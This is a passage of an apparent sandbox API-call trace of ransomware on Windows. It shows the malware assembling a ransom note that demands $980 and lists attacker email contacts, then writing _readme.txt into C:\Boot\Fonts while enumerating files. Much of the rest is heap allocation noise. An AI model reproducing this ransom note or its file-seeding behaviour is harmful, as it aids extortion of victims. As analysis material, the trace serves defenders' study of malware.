us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.598] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.598] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.599] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.600] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.600] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*" (normalized: "c:\\boot\\fonts\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.601] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.601] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95768820, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.601] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0174.601] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x9571c560, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0174.601] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0174.601] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957426c0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x957426c0, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0174.601] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0174.601] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95768820, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95768820, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0174.601] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.602] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.603] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.610] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.621] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.624] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.625] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.626] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.626] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.627] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.627] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 